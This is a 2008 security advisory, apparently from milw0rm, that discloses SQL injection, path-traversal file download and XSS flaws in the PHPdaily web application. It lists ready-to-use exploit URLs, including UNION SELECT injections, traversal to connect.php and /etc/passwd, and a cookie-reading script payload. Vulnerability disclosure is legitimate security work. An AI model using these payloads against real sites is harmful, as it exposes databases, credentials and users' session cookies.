___________________________________________________________________________________________________________
  |  _          __  ___  ___ __________________     ___  ___ ____  ______  __  ___ _________________ _______  |
  | | |        / / /  / /  //_______   _______/    /  / /  //    ||  ____||  |/  //     ___________//       \ |
  | | |  ^    / / /  /_/  /  /__/  /  /___    ___ /  /_/  //     ||  |    |  v  //     /___        /    O   / |
  | | | / \  / / /   _   /  /  /  /  ____/   /__//  __   //  /|  ||  |    |     \\    ____/       /        /  |
  | | |/   \/ / /  / /  /  /  /  /  /_______    /  / /  //  /_|  ||  |___ |  |\  \\  /__________ /    /\   \  |
  | | /  /\  / /__/ /__/  /__/  /__________/   /__/ /__//________||______||__| \__\\___________//____/  \___\ |
  | |   /  \/                                                                                                 |
  | |  / _____________________________________________________________________________________________________|
  | | / /    .: PHPdaily Multiple Remote Vulnerabilities (SQL-INJ,XSS,Local File Download Vulnerability):.    |
  | |/ /______________________________________________________________________________________________________|
  | v / Discoverd By:  0xFFFFFF                            . Main THX: ALLAH                                  |
  |  /  Home:          www.white-hacker.com                . Greetz To: All Hackers & WHITE-HACKER Team       |
  | /   Mail:          admin(at)white-hacker[dot]com       .                                                  |
  |/    Country:       Algeria                             .                                                  |
  v___________________________________________________________________________________________________________|
  |     Publication info :.                                                                                   |
  |___________________________________________________________________________________________________________|
  |     Date:          23-10-2008                          . Method   :         [*] GET   [ ] POST            |
  |     Content:       Vulnerability                       . Register Globals : [ ] ON    [*] OFF             |
  |     Type:          SQL-INJ,XSS,LFD                     . Magic quotes :     [*] ON    [ ] OFF             |
  |     Application:   PHPdaily                            . Risk:              [*] High  [ ] medium  [ ] Low |
  |     Venedor site:  http://phpdaily.self-reliance.be/   .                                                  |
  |     Version:       N/A                                 .                                                  |
  |     -------------------------------------------------- .                                                  |
  |     Impact:        Exploring Database                  .                                                  |
  |                    Run unauthorized JavaScript         .                                                  |
  |                    Local File Download                 .                                                  |
  |     -------------------------------------------------- .                                                  |
  |     Exploit:       Available                           .                                                  |
  |     Fix:           N/A                                 .                                                  |
  |___________________________________________________________________________________________________________|
  | Description :.                                                                                            |
  |___________________________________________________________________________________________________________|
  |                                                                                                           |
  | After a quick audit, I have noticed that PHPdaily is a very weak script which contains many types of      |
  | vulnerabilities.                                                                                          |
  |                                                                                                           |
  | Inputs "id,prev" passed into add_postit.php,delete.php,prest_detail.php,mod_prest_date.php pages are not  |
  | properly verified, a simple user can easily get sensitive information from the database by injecting      |
  | SQL Queries.                                                                                              |
  |                                                                                                           |
  | Also through "download_file.php" page via the input "fichierwe" any user can download any local file.     |
  | Furthermore, through "add_prest_date.php" page there is the ability of XSS.                               |
  |                                                                                                           |
  | ......................................................................................................... |
  |                                                                                                           |
  | Requirement                                                                                               |
  | You have to connect as a simple user                                                                      |
  |                                                                                                           |
  | 1. SQL injection Exploit :                                                                                |
  | [Site]add_postit.php?mode=rep&id=-1+union+select+1,2,3,version(),5,6,7,8#                                 |
  | [Site]delete.php?prev=accueil&mode=postit&id=[SQL-INJ] (-1+union+select+[17 Columns])                     |
  | [Site]prest_detail.php?prev=[SQL-INJ]                                                                     |
  | [Site]mod_prest_date.php?prev=list&id=[SQL-INJ]                                                           |
  |                                                                                                           |
  | 2. Local File Download Exploit :                                                                          |
  | [Site]download_file.php?fichier=../include/connect.php                                                    |
  | [Site]download_file.php?fichier=../../../../../../etc/passwd                                              |
  |                                                                                                           |
  | 3. XSS Exploit:                                                                                           |
  | [Site]add_prest_date.php?date="><script>alert(document.cookie)</script>                                   |
  |___________________________________________________________________________________________________________|
  | Notice :.                                                                                                 |
  |___________________________________________________________________________________________________________|
  | These publications are published for educational purpose thus the author will be not responsible          |
  | for any damage.                                                                                           |
  |___________________________________________________________________________________________________________|
                                                \  © WHITE-HACKER  All contents © 2008. All rights reserved.  |
                                                   \____________________________________________________________|

# milw0rm.com [2008-10-24]